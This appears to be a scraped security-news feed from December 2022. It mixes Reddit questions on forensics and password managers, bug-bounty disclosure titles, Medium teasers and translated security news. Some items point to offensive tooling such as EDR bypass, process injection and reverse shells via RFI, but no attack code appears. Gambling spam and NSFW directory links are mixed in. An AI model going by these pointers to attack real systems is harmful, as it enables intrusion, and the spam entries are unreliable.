    I stored all my 2FA tokens in my password manager since it still grants most of the 2FA advantages but also makes it a lot easier and more comfortable to use, because all you need is the password manager to log in to something. But I would also like 2FA for the login to my password manager, which would require me to use another app only for one single 2FA token. Or do you think this is unnecessary and I should just stick to my master password? How did you set up your password managers and do you have any recommendations on what the most secure way of using it is? submitted by /u/kdoersing
    Simplified Hacking: The definitive guide to OSINT
    OSINT (Open Source Intelligence) is a technique that consists of collecting information from publicly available sources in search of…
    Identifying Phishing Pages with Shodan
    Methodology
    How to find potential profiles of a person across the internet
    Profil3r is a free and open-source tool available on GitHub. It is used to find potential profiles of a person on different sites. This…
    SPY NEWS: 2022 — Week 50
    Summary of the espionage-related news stories for the Week 50 (December 11–17) of 2022.
    Day 3 — Next Level Font Obfuscation
    submitted by /u/Exact-Practice-8658
    Venom is a library that is meant to perform evasive communication using a stolen browser socket.
    submitted by /u/Idov31
    Your Car is Trackable by Law: TPMS tracking for $30
    submitted by /u/Exact-Practice-8658
    Gepetto - An IDA plugin which queries OpenAI's davinci-003 language model to speed up reverse-engineering
    submitted by /u/galaris
    gh0x0st/wanderer: An open-source process injection enumeration tool written in C#
    submitted by /u/dmchell
    namazso/linux_injector: A simple ptrace-less shared library injector for x64 Linux
    submitted by /u/dmchell
    Revolutionize Your Hacking Skills with ChatGPT: The AI Assistant That Will Take Your Cybersecurity…
    As a penetration tester or bug bounty hunter, you know the importance of having the right tools at your disposal. ChatGPT is a powerful AI…
    How Bug Bounty Programs can Help Improve the Hospital Security
    Healthcare security teams are under extreme pressure to protect their surroundings from an increasing number of threats.
    Social Engineering: What Is Social Engineering? | Part 2
    In the last blog, we briefly overviewed social engineering and how it can be used in real life. In this blog, we'll learn about what is…
    Recon for Ethical Hacking — Sources and Checklists
    Search engine:
    Burp Suite Android Emulator
    Guide to setting up Burp Suite on your Android Emulator
    How I was able to steal users' credentials via Swagger UI DOM-XSS
    Hello guys, today I’m gonna explain how I got DOM-XSS from Swagger-UI and exploited it to make HTML and JavaScript injections to create a…
    TCU Passware (2022DEC18)
    The latest "TCU Passware" (2022DEC18) has been released. This live distro automatically initializes the Passware Linux agent and adds it to your Passware cluster. It includes an SSH server (u:user, p:live) so you can log in to debug the agent if required. It also has hashcat included, so if you stop the Passware Linux agent you can use it for direct GPU-accelerated hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1BChc2kbErGPOFrDnvC8EO55PIWnuL-vX submitted by /u/atdt0
    TCU Hashtopolis (2022DEC18)
    The latest "TCU Hashtopolis" (2022DEC18) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. It includes an SSH server (u:user, p:live) so you can log in to debug the agent if required, which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included, so if you stop the Hashtopolis Linux agent you can use it for direct GPU-accelerated hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0
    TCU Live: 2022DEC18 (latest release)
    The latest version of "TCU Live" (2022DEC18) has been released. It's running the latest Debian sid packages, the Linux 6.0.0 kernel for modern hardware support, and updated third-party packages such as the Tor Browser, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware, give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0
    The Windows Process Journey — LogonUI.exe (Windows Logon User Interface Host)
    submitted by /u/boutnaru
    Memory Forensics Question
    I recently had to conduct a compromise assessment on a Windows 10 device. When looking at the processes, a flag was raised when wininit.exe had a parent of lsass.exe. My understanding is that wininit.exe has a parent of smss.exe, but smss.exe terminates, so wininit.exe doesn't have a parent that can be seen. lsass.exe is actually a child of wininit.exe. I decided to take a look at some other memory dumps that I had lying around. Straight away I found one which had services.exe as the parent of wininit.exe where, again, services.exe should be a child of wininit.exe. This started me wondering what was going on. My best theory is that the PID of smss.exe is being reused after it terminates and is being reissued to processes which start after it terminates. So smss.exe has a PID of 150 when it creates wininit.exe, leaving wininit.exe with a PPID of 150. Smss.exe then terminates, leaving the PID free to be reused. Wininit.exe then creates a child process which is then issued with a PID of 150. Is this a viable theory, or am I barking up the wrong tree? submitted by /u/curlydog998
    CVE – A Collaborative Virtual Environment
    Article URL: https://cve.sourceforge.net/ Comments URL: https://news.ycombinator.com/item?id=34040379
    FreeBuf Morning Report | Microsoft discloses 56 product security vulnerabilities; Ukrainian government website breached again
    Microsoft officially released advisories for multiple security vulnerabilities, including 56 in Microsoft products themselves; an attacker who successfully exploits them can execute arbitrary code on the target system, obtain user data, escalate privileges, and more.
    SharpSCCM: a powerful tool that uses SCCM for lateral movement
    The tool mainly leverages Microsoft Endpoint Configuration Manager (SCCM) and performs lateral movement and credential collection by accessing the SCCM administration console GUI.
    Internal network penetration - 1. Intranet basics and building a domain environment
    An internal network, also called a local area network, is a group of computers interconnected within a given area, typically spanning no more than a few kilometres.
    Pyramid: an EDR bypass tool designed for red teams
    Designed for red team researchers, the tool helps researchers get EDR to treat it as a legitimate Python application by leveraging some of Python's evasive properties.
    Finding request paths in the Tomcat source code for injection
    This article shares the process of finding request paths in the Tomcat source code for injection, for reference only.
    OS Talks (Computing)
    OS Talks
    OS Talks (Algorithms)
    From an exam-taking perspective, the operating systems course boils down to a handful of algorithms and a handful of problems.
    A cybersecurity student's final exams
    As the ancients said, "however great your kung fu, you still fear the kitchen knife": even the strongest technical experts have to sit final exams, let alone a rookie like me.
    SecWiki News 2022-12-18 Review
    No news updates today. For more of the latest articles, visit SecWiki.
    [user_oidc] Stored XSS via Authorization Endpoint - Safari-Only
    Nextcloud disclosed a bug submitted by lauritz: https://hackerone.com/reports/1687410 - Bounty: $100
    [user_oidc] Unencrypted Communications
    Nextcloud disclosed a bug submitted by lauritz: https://hackerone.com/reports/1687005
    GRAND OPENING OF THE EXCLUSIVE SODO XSST BRAND
    >> JANUARY 1, 2023. ♦️ A new exclusive game portal from Sodo66; join HR99 to celebrate the 12th anniversary of the founding of the Group…
    Index of Mistress
    submitted by /u/damschreeuwer
    or for skittish!! Viewer discretion is advised.
    NSFW short movie clips of some very strange perversion. http://www.donnerpartycatering.com/uploads/ submitted by /u/BustaKode
    Bug Bounties: Past, Present, Future...
    submitted by /u/soupcreamychicken
    Scheduled Tasks for Cyber Security Professionals
    What are Scheduled Tasks?
    Six Year Old SQL Injection Vulnerability in Knex.js
    Article URL: https://www.ghostccamm.com/blog/knex_sqli/ Comments URL: https://news.ycombinator.com/item?id=34034498

    What is Bug Bounty? What are Bug Bounty platforms, and how do you earn rewards on them?
    Greetings to all cyber security enthusiast friends. In times when the markets are taking a merciless beating and investments are constantly at a loss, but certainly…
    HTTP Analysis
    What is HTTP
    No rate limit vulnerability on #Amazon
    Hello guys, Vedavyasan here👽✨.
    The Dark Art of RFI: A Step-by-Step Guide to Obtaining a Reverse Shell!
    Hello lamers, today we will talk about file inclusion and how to use a remote file inclusion (RFI) vulnerability to gain a reverse shell.
    BUG BOUNTY JOURNEY
    BBJ101:
    A list of search engines for Marketers/Pen-testers/OSINT Engineers — Part-2
    Greetings, Medium.
    Simplified Hacking: Main OSINT tools and services
    OSINT (open source intelligence, or information from open sources) is the term used to describe information obtained from sources available to…
    Infectious File Writeup
    PROLOGUE
    The Archive Writeup
    PROLOGUE
    Overview eJPT - Matheus Gutierre
    17th of December 2022 — The day I passed the eLearnSecurity Junior Penetration Tester. The exam consists of 20 questions, where the rate…
    In-Depth with the Tools of Kali Linux: Sharpening the Axe
    Very recently, I accomplished two incredible feats:
    Pandora HackTheBox Walkthrough
    Summary: Pandora is a Linux machine and is considered an easy box by Hack The Box, but indeed it is not. With this box,
    xplico
    I'm new to digital forensics. I'm trying to analyze the official xplico sample captures, but I get results of 0 everywhere. I have no idea what I am doing wrong. Also looking for some other samples; any advice appreciated. Thanks submitted by /u/Powerful-Ad-9564
    Link for Magnet Acquire?
    Could anyone provide me with a download link for Magnet Acquire? I filled out the request form, but I need to make an image of a phone now and can't really wait the 24 hours I've read it takes for them to get back to you. Either that, or if someone can direct me to instructions on how to get an image of a locked Android phone. Either would be greatly appreciated. I'm still going to work my google-fu, but it never hurts to ask. submitted by /u/thenebular
    WinVerifyTrust Signature Validation CVE-2013-3900 Mitigation && Windows Speculative Execution Configuration Check
    Hi, we have installed all up-to-date updates for the 2016, 2019 and 2022 OS. My question is: even though I have installed all updates, do I have to set the regedit settings below? According to the MS article (https://support.microsoft.com/en-au/topic/2f965763-00e2-8f98-b632-0d96f30c8c8e), even if I installed all updates for 2016 / 2019 / 2022, do I have to set the regedit settings below? Correct? Because, according to the MS article, some of the CVEs are mitigated by default on the 2019 / 2022 OS.
        # WinVerifyTrust certificate padding check (CVE-2013-3900); the value name must not contain spaces
        New-Item -Name "Config" -Path 'hklm:\Software\Microsoft\Cryptography\Wintrust\' -Type Directory -Force | Out-Null
        New-ItemProperty -Path "hklm:\Software\Microsoft\Cryptography\Wintrust\Config\" -Name "EnableCertPaddingCheck" -Value "1" -PropertyType String -Force
    To protect against all of them (with hyperthreading enabled):
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 72 /f
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
    If anyone has any ideas for this I would love to hear them. Thanks! submitted by /u/maxcoder88
    SecWiki News 2022-12-17 Review
    No news updates today. For more of the latest articles, visit SecWiki.
    Index of /stuff/
    submitted by /u/taramj13
    Exploiting API Framework Flexibility
    submitted by /u/6W99ocQnb8Zy17
    OSCP guide 2022
    Here is my personal guide for the current OSCP format (2022). All the advice you'll find here rewarded me a lot during my training. I hope my advice will be valuable to you, and I wish you guys a lot of luck in your journey. English: https://sgtdede.gitbook.io/hacking/oscp-2022/guide-en French: https://sgtdede.gitbook.io/hacking/oscp-2022/guide-fr Note: I'll probably add some stuff to these guides in the next weeks. Please let me know if you want me to answer specific questions or add some topics to this guide :) submitted by /u/sgtdede
    Email Verification Bypass Allows Users to Add & Verify Any Email As Guardian's Email
    Khan Academy disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1636552

    Top Reasons Why Most Bug Bounty Hunters End Up Unpaid?
    Bug bounty hunters are individuals or groups who search for and report vulnerabilities in software and other systems for a monetary reward…
    Top 7 Tips to Succeed in Bug Bounty Programs
    Writing a technical write-up for a bug bounty program can be a daunting task, especially if you are new to the field of cybersecurity…
    CVE-2022-42710: A journey through XXE to Stored-XSS
    Hi everybody, I will share with you in this article in detail how I was able to find CVE-2022-42710 through static analysis
    Simple CORS misconfig leads to disclosure of a sensitive token worth $$$
    Hey fellow hackers and bug hunters, recently I found some weird CORS misconfiguration in one of my targets.
    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    Join in on some super cool infosec discussions from experts all over the world!
    Bypass Admin Panel Using Google & fetch all Users Data [Data Breach]
    How I was able to bypass the admin panel using Google dorks, gaining access to authenticated endpoints and to all P1 users' info
    Param Hunting to Injections
    Hey hackers! How’s your week going?
    XSS Stored on JD.id
    Hi Everyone,
    How to Succeed in Bug Bounty?
    Bug bounty programs are a popular way for organizations to identify and fix vulnerabilities in their systems. By offering rewards to…
    Sensitive Information Disclosure on bukalapak.com
    Hi Everyone,
    NIST Retires SHA-1 Cryptographic Algorithm
    submitted by /u/OfftheTopRope
    iCloud warrant returns
    Any suggestions on how to parse an iCloud warrant return (production folder) in Oxygen? I've used a couple of their preset options and haven't been too happy with the results. Strictly for testing and comparison of the representation of the data. I normally use a combination of Physical Analyzer and Axiom, but am testing out other tools at our disposal. Any recommendations would be greatly appreciated. submitted by /u/arcticbluealex
    What's the best DFIR investigation tool and why?
    There are tons of different ways to collect evidence, but what's the best to use for analysis once the evidence is in place/collected, and why? Edit: Seeing the first wave of answers, I want to clarify my question. I am specifically asking about the investigation part - what do you use and recommend for putting together the case timeline and the report to send to the customer (in case you provide DFIR as a service), etc.? I've heard good things about Google Timesketch, but what are some of the others, especially when your case spans multiple platforms? submitted by /u/texmex5
    External application usage of mobile photo picker
    Currently looking through Axiom at some images that have been opened. At 19:29:42 a new KnowledgeC application event occurred with the application name 'com.apple.mobileslideshow.photo-picker'. At 19:30:01 the file is accessed. While I know this is the Photos application, I am trying to figure out whether other applications have access to this photo picker intent, or whether this confirms that the particular video the user accessed was accessed through the internal photo library (the user has saved indecent media etc., potentially received through external applications such as Kik, Wickr, Twitter). My question is: if a user were to receive a bunch of videos/photos in a single grouped message (so they are displayed in a tiled collage format), would it show up in the logs as 'com.apple.mobileslideshow.photo-picker'? Or would they use their own method of viewing photos? Thank you for any help, and I do hope I explained it sufficiently. submitted by /u/National-Ad-7856
    Group Policy settings command line struggles
    Hello. I am trying to enable/configure some Edge settings via gpedit. I can open gpedit and enable a setting, and I can see where it adds the registry key to do so. I am trying to automate these settings into a PowerShell script, so I figured if I add the same registry key gpedit adds, then I should be okay, right? That does not seem to be the case. If I add the key the exact same way, gpedit shows that setting as still not configured. What am I doing wrong? I did try the Set-GPRegistryValue cmdlet too, just to see what would happen, but that gives me an error that the cmdlet does not exist. I was hoping just adding the correct registry key would work. Is there a way to fix this? Or if someone knows how to enable gpedit settings in PowerShell, that would be useful as well. submitted by /u/BelugaBilliam
    Risk of taking devices to Hong Kong
    I was reading through some posts about people travelling to China; the recommendations were to only bring burner phones and to keep them on your person at all times. Is the security risk as big in HK as well? I'm gonna bring an old phone for daily use but would like to bring my regular phone to take pictures with, as it has a good camera. I would keep it in airplane mode at all times. Is that a good idea or should I just leave it at home? submitted by /u/M4K1TK4
    Is there a working way to install unicornscan on a current Ubuntu distro?
    Due to some system issues I'm trying to avoid Docker as well, but can try that as a last resort. submitted by /u/ChrisOSSTMM
    WiFi on Airplanes
    I'm curious what other companies/security professionals recommend for enterprise users when they need to work on an airplane. Are there any other solutions/tips beyond utilizing a VPN to ensure maximum security while in the air? Thanks! submitted by /u/hogermite
    Managing multiple passwords?
    Like pretty much everyone else on the planet, I have accumulated a vast number of logins, and like almost everybody else, I have re-used passwords. Although I use a password manager (Bitwarden), I still like to have at least some passwords I can remember, or at least easily type in. There are occasions when I've needed to manually enter a password, and for those times a short, but safe, password is preferable. I now have the issue that according to https://haveibeenpwned.com some of my passwords have been compromised - including some of those I use most often! I could use my password manager to simply create strong passwords for all my logins, which means none of them will be memorizable. At least, I can't remember "AC9mB#eR". I'm just wondering what I should do. I'm so used to my passwords, especially the pwned ones, that changing them will be a wrench. And I know I should use different passwords for all my logins, but I'm loath to do so ... What is the best balance between security and ease of use for managing multiple passwords? Is there a better manager than Bitwarden? submitted by /u/amca01
    LFI at http://www.
    Sony disclosed a bug submitted by n0x496n: https://hackerone.com/reports/986380
    Sub-Domain Takeover at http://www.codefi.consensys.net/
    Consensys disclosed a bug submitted by krrish_hackk: https://hackerone.com/reports/1717626 - Bounty: $500
    Akismet API keys are exposed by authentication method
    Automattic disclosed a bug submitted by aaroncarson: https://hackerone.com/reports/1736846 - Bounty: $100
    IWCON2022 Networking Rooms Are Now Open + New Speaker Announcement
    High Level Analysis of Custom Browsers
    Cyber Threat Intelligence (C.T.I)
    Getting Started with Reverse Engineering
    Using Threat Intelligence data to generate MISP alerts
    There are various Threat Intelligence sources that share threat information with each other to help identify those threats in their…
    Malware analysis
    Advent of Cyber 2022 [Day 15] Secure Coding | Santa is looking for a Sidekick | Simple Write up
    Param Hunting to Injections
    Only 24 Hours Left For IWCON2022
  • Open

    Red Teaming | A History
    Continue reading on Medium »
  • Open

    Vulnerability scanner written in Go that uses osv.dev data
    Article URL: https://github.com/google/osv-scanner Comments URL: https://news.ycombinator.com/item?id=34016188 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-12-16 Review
    DarkAngel: a fully automated white-hat vulnerability scanner by 路人甲 Project Achilles: a prototype tool that uses an RNN for static vulnerability detection in Java source code by ourren For more recent articles, visit SecWiki
  • Open

    [NSFW] Went looking for some Jamie xx, xx. Some roody noody pics in the last 1.
    https://www.aquarius-publishing.com/RADIO/ https://dl2.beelody.com/Free/2021/ http://kadak.mrak.cz/ submitted by /u/ringofyre [link] [comments]
  • Open

    What Is XSS?
    Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious code into a website or web… Continue reading on Medium »
  • Open

    Build: an open source IDE for authoring, testing, and verifying production-ready security tests.
    submitted by /u/DH_Prelude [link] [comments]
    Critical Vulnerability Found in Sovrin, a Popular Decentralized Identity System
    submitted by /u/jat0369 [link] [comments]
    Foxit PDF Reader - Use after Free - Remote Code Execution Exploit
    submitted by /u/hacksysteam [link] [comments]
  • Open

    Fuzzing Weekly CW50: Understanding Fuzz Testing in Go
    Article URL: https://ioc.exchange/@FuzzingWeekly/109522672743186088 Comments URL: https://news.ycombinator.com/item?id=34012649 Points: 2 # Comments: 0
  • Open

    FreeBuf Weekly | Ukrainian government networks breached; the ITTF leaked hundreds of athletes' passport details
    We have summarized and recommended this week's hot news, security incidents, good reads and handy tools, so you won't miss any of this week's key points!
    How to use Klyda to detect password spraying and dictionary attack vulnerabilities in web applications online
    Klyda is a powerful web application vulnerability detection tool that helps researchers quickly check whether a target web application is vulnerable to credential-based attacks.
    Third-party vendor data leak: Gemini customers may face phishing attacks
    Gemini customers may already have become targets of phishing attacks.
    Pylirt: a powerful Linux incident response toolkit
    Pylirt is a cybersecurity incident response toolkit for Linux systems; with its help, researchers can easily collect all kinds of information about a target Linux system.
    An introduction to the free web application firewall 南墙 (Nanqiang)
    The best-known free web application firewall is undoubtedly ModSecurity. However, ModSecurity suffers from poor usability, high false-positive rates and a lack of flexibility, so today we introduce a free and easy-to-use web application firewall: 南墙 (Nanqiang).
    Ukrainian government networks breached after installation of trojanized Windows 10 installers
    Using trojanized ISOs in an espionage operation is novel, and the inclusion of anti-detection capabilities shows that the actors behind this campaign are security-aware and patient.
    FuboTV says a cyberattack caused its World Cup streaming outage
    At 2 p.m. US Eastern time on the 14th, FuboTV suffered a cyberattack that left users unable to log in to the live stream of the Qatar World Cup semi-final between France and Morocco.
    FBI critical infrastructure intelligence site hacked, database for sale on the dark web
    Its database was illicitly offered for sale on the dark web, containing the contact details of more than 80,000 prominent private-sector members.
    150,000 people gather in a multidimensional space: the CIS 2022 cybersecurity conference remains hot
    The close of the multidimensional space is by no means the end of the CIS Cybersecurity Innovation Conference, but a new beginning.
  • Open

    A Purge is Underway on Twitter
    Update: Overnight Musk was challenged by reporters on a Twitter space. What did Musk do? Leave the space and close Twitter Spaces of… Continue reading on Medium »

  • Open

    Know Your Target — Web Recon
    # Everything has a beginning!!! Continue reading on Medium »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application Continue reading on Medium »
    How to create nuclei templates?
    Nuclei templates are a powerful feature of the Nuclei vulnerability scanning tool, which allows you to create custom templates for… Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part two)
    Hello again friends, I’m Koroush (aka whiteOwl). I hope you enjoy the last part, in this part, I introduce you to several active recon… Continue reading on Medium »
    Payment Gateway Bypass on Government Domain.
    The vulnerability was found on the website which is used to pay Challan online to Ahmedabad Traffic Police. Continue reading on Medium »
    How to Inform an Organization about a Security Vulnerability
    Finding a new vulnerability is thrilling and might be beneficial depending on the vulnerability and company. However, identifying the… Continue reading on Bug Zero »
    Nmap : The Network Mapper for Free Security Scanning
    A free and open-source tool for network discovery and security auditing is called Nmap (“Network Mapper”). Continue reading on Bug Zero »
    The Necessity of Software Testing
    Software testing is an essential feature that affects the health and effectiveness of the software. It assures the trustworthiness of… Continue reading on Bug Zero »
    Lastpass Password Manager, Has Been Hacked, Again!
    What is LastPass? Continue reading on Bug Zero »
    The simplest way to install go lang ( Go Language )
    Hi friends 🙏, today we will see another / simplest way to install go lang (Recommended) on kali Linux. This article gives a step by step… Continue reading on Medium »
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    In this article, we will be exploring the ins and outs of file inclusion vulnerability exploitation. Continue reading on InfoSec Write-ups »
  • Open

    PAI Research Process, part 2
    As Anthony D. states on LinkedIn, “Proper OSINT investigations require a methodical approach in order to protect the analyst and the… Continue reading on Medium »
    Gas Attack Writeup
    MISSION BRIEFING Continue reading on The Sleuth Sheet »
    TRYHACKME: Advent of Cyber 2022 [Day 3] -OSINT Nothing escapes detective McRed
    Scenario: As the elves are trying to recover the compromised santagift.shop website, elf Recon McRed is trying to figure out how it was… Continue reading on System Weakness »
    OSINT — Hunting Subdomains
    Listing Subdomains Continue reading on Medium »
    10 Practical Recon & vulnerability Scanners for bug hunters (part two)
    Hello again friends, I’m Koroush (aka whiteOwl). I hope you enjoy the last part, in this part, I introduce you to several active recon… Continue reading on Medium »
    Simple bot-trap in Telegram
    Our bot functionality will include a chatbot that mimics itself as any functional bot that generates a report in response to a user… Continue reading on Medium »
    OSINT — Looking up a Bitcoin wallet.
    Bitref — helps you check the balance of any Bitcoin wallet. You only need to provide a valid address. The service uses only public… Continue reading on Medium »
  • Open

    What enterprise antivirus do you know that have autodeploy?
    Hi there, I'm interested in antivirus products that have autodeploy for Windows/macOS/Linux. And how does this deploy work? For example, McAfee has synchronization with AD and the agent is pushed to all newly discovered devices, but Windows, macOS and Linux must have a pre-configured environment (appropriate ports opened, a connection to the management system, etc.). The problem is that synchronization is timed and new devices that appeared in the AD may not be online, so the agent will not be installed. I want the antivirus to deploy immediately as soon as the machine is added to the AD (if technically possible). submitted by /u/athanielx [link] [comments]
    DLP Tool
    What's your take on DLP for endpoints & Network+CASB which one is doing good in the market with windows+mac laptops? submitted by /u/namesake112 [link] [comments]
    Realistically, what are the risks of sharing my IP?
    I'm hosting a server that sends and receives UDP packets and I want to share the IP so anybody can connect to it. The PC it's being hosted on has basically nothing on it, so there's no sensitive info, stored passwords, etc. on it, but there is on other PCs connected to the same router. I went into my router settings and opened the port in the port forwarding section, for the host machine's internal IP only, and all machines have network discovery turned off. I'm aware that DoS is a risk, but other than that, is there anything I need to be worried about? submitted by /u/Edward_Fingerhands [link] [comments]
    Reminder -- Free Webinar Tomorrow (Thursday) - TLS 1.3 and how it differs from previous versions of SSL/TLS
    https://www.reddit.com/r/AskNetsec/comments/zei9t1/free_live_webinar_tls_13_and_how_it_differs_from/ Just wanted to drop a quick reminder for folks in case you didn't see the initial thread... I had asked if this subreddit would be interested in a TLS 1.3 webinar, and people responded positively, therefore ... I'm offering a free live webinar tomorrow (Thursday) at 02:30p PST / 05:30p EST. I'll copy and paste the main details below, but more details are in the original thread. TLS 1.3 and how it differs from previous versions of SSL and TLS Thursday :: 12/15/2022 :: 02:30p PST / 05:30p EST Duration: 2 hours Agenda: 60-75~ minutes of lecture, with 3 breaks for Q&A followed by free for all Q&A on anything TLS/SSL related for the remainder of the session.   Topics I plan to cover: Old protocols no longer supported Simpler Cipher Suites Fewer Cipher Suites All TLS 1.3 Ciphers are AEAD Forward Secrecy Removed Custom DH Groups Shorter Handshake (One Round Trip) Most of the Handshake is Encrypted Client Certificate is Encrypted Many, Many more Session Keys Middleboxes - what they are, how they inhibited smooth TLS 1.3 transition For each topic I plan to describe how a feature worked in TLS 1.2 and prior, how it was broken, and how TLS 1.3 improved it. submitted by /u/erh_ [link] [comments]
  • Open

    Exposed Log File Lead to Full Internal path disclosure at [https://nextcloud.com/wp-content/debug.log]
    Nextcloud disclosed a bug submitted by 0x3bdo: https://hackerone.com/reports/1767439
    Firebase credentials leak
    MTN Group disclosed a bug submitted by jimmisimon: https://hackerone.com/reports/1691888
    [MK8DX] Improper verification of Competition creation allows to create "Official" competitions
    Nintendo disclosed a bug submitted by rambo6glaz: https://hackerone.com/reports/1653676 - Bounty: $577
  • Open

    Cellebrite UFD
    I've received an iPhone collection. It contains a UFD file along with a zip file. Do I need Cellebrite Physical Analyzer in order to view the data? In previous instances I have received a reader alongside a UFDR report. submitted by /u/theedon323 [link] [comments]
    I'm halfway through my APFS Advent Challenge.
    submitted by /u/jtsylve [link] [comments]
    Pioneer car stereo is hacked. Factory reset does not erase this one number and it's presets.
    submitted by /u/AmIontheTrumanshow [link] [comments]
    WeChat extraction - Android devices
    Forensic collection of two Android mobile devices, outsourced to 2 different vendors in two different locations. The weapons in their arsenal are just UFED and Oxygen. Essentially, we need the “most complete” image from an Android device, and it is absolutely essential that we capture WeChat. One vendor was able to get everything out, and the second one got no WhatsApp and no WeChat. I’m just curious, as I wasn’t on prem and can’t comment on how the second vendor fudged up, but (as I am now not involved in collections anymore) what would be YOUR way of going about this? Are there specific extraction methods in file system or AL that capture particular third-party messaging applications? What can we do to make sure WeChat is not missed? Any past experiences? submitted by /u/greez__monkey [link] [comments]
  • Open

    Malware analysis
    Forensic McBlue to the REVscue! THM — aoc 2022 day 12 Continue reading on InfoSec Write-ups »
    Signature Evasion : tryhackme
    Using the knowledge gained throughout this task, split the binary found in C:\Users\Student\Desktop\Binaries\shell.exe using a native… Continue reading on Medium »
  • Open

    How Elon Musk Says He Catches Leakers at His Companies
    submitted by /u/moxofoxo [link] [comments]
    A vulnerability in the UMPD (User-Mode Printer Drivers) allows local users to trigger a use-after-free vulnerability. The vulnerability works from Windows 8 and above, and is fairly easy to exploit on older Windows machines.
    submitted by /u/SSDisclosure [link] [comments]
    SHA-1 is out. NIST recommends switching to the SHA-2 and SHA-3 groups of hash algorithms as soon as possible, with an official deadline of Dec. 31, 2030.
    submitted by /u/nist [link] [comments]
    Salt Labs | Missing Bricks: Finding Security Holes in LEGO APIs
    submitted by /u/ynvb [link] [comments]
    Unauthenticated Buffer Overflows in multiple Zyxel routers still haunting users - Metasploit exploit code published, thousands of devices potentially affected!
    submitted by /u/0x9000 [link] [comments]
    PyPI malware creators starting to employ Anti-Debug techniques
    submitted by /u/SRMish3 [link] [comments]
    BSidesSF 2023 Call For Presentations, Workshops, and Villages
    submitted by /u/reedloden [link] [comments]
    How NOT to patch Integer Overflow in JavaScript - Technical analysis of over 50 community submissions
    submitted by /u/pi3ch [link] [comments]
  • Open

    SecWiki News 2022-12-15 Review
    Full-scope security asset management: advanced practice by ourren Reflections on algorithmic warfare from the kill-chain perspective by ourren EMS: an efficient mutation-based fuzzing system driven by experimental data by ourren For more recent articles, visit SecWiki
  • Open

    Browser powered scanning 2.0
    It's been two years since we unleashed browser powered scanning on the world, and we decided what better way to celebrate than to start again from scratch! It started out as a task, how did it end up
  • Open

    Digging Inside Azure Functions: HyperV Is the Last Line of Defense
    We investigated Azure's serverless architecture and found that a HyperV VM was the remaining defense after a container breakout. The post Digging Inside Azure Functions: HyperV Is the Last Line of Defense appeared first on Unit 42.
  • Open

    Tryhackme: Simple CTF
    No content preview
    How To Exploit File Inclusion Vulnerabilities: A Beginner’s Introduction. — StackZero
    No content preview
  • Open

    50,000 extremist groups, $1.2 billion in illegal goods sales over two years: dark web statistics are shocking
    This list of 2022 dark web statistics gives us a deeper understanding of how large the dark web threat is, and of what may be happening behind the scenes.
    FreeBuf Morning Report | US Senate passes bill banning TikTok on government devices; hackers release iOS 16 jailbreak tool
    The bill prohibits federal employees from downloading or using the short-video app TikTok on government devices. It still needs to pass the House and be signed by the President to become law.
    Year's end approaches, the battle heats up | The 2022 Cybersecurity Co-builder Honor Battle begins!
    The contest for the year's strongest co-builder is about to begin. Who will be this year's strongest "cybersecurity encyclopedia expert"? Let's wait and see!
    The ITTF leaked hundreds of athletes' passports and vaccination certificates
    Passport details and vaccination certificates of hundreds of table tennis players were leaked, including information on Chinese players Ma Long and Fan Zhendong.
    Microsoft patches Windows zero-day used to spread ransomware
    In its most recent Patch Tuesday, Microsoft fixed a high-profile zero-day vulnerability tracked as CVE-2022-44698.
    New GoTrim botnet attempts to break into administrator accounts on WordPress sites
    A new Go-based botnet has been discovered scanning for sites that use the WordPress content management system (CMS).
  • Open

    Exploiting SUID Binaries - Linux PrivEsc
    submitted by /u/Clement_Tino [link] [comments]
    Red-Teaming-Toolkit: This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
    submitted by /u/boutnaru [link] [comments]
  • Open

    How to Find XSS Like a Pro
    Thread 🧵:👇 Continue reading on Medium »
  • Open

    The Pacific War Online Encyclopedia left their directory wide open
    As the title suggests. Many images of ships, planes, troops, etc associated with the Pacific War efforts. Lots of old, historical photos. Did a local search of this sub for prior posts and came up blank, so added it. Directory of Images submitted by /u/BustaKode [link] [comments]
    How to figure out the size of a folder in an OD?
    I am using wget to download a folder, and I think I will have to leave my computer overnight to let it download fully. But there is one concern I have: I don't know if I have enough storage rn for it. Is there any way to check the size of a folder? submitted by /u/KK_005 [link] [comments]
  • Open

    Wordfence launches free vulnerability database API and web interface
    Article URL: https://www.wordfence.com/threat-intel/ Comments URL: https://news.ycombinator.com/item?id=33992907 Points: 5 # Comments: 0

  • Open

    Business logic vulnerabilities
    Hi Guys, I consider myself below average when it comes to finding Business logic vulnerabilities, and I want to improve at it. How do you deal with this kind of vulnerability? What advice would you give to move forward? submitted by /u/Abofouad [link] [comments]
    CNA script testing/feedback
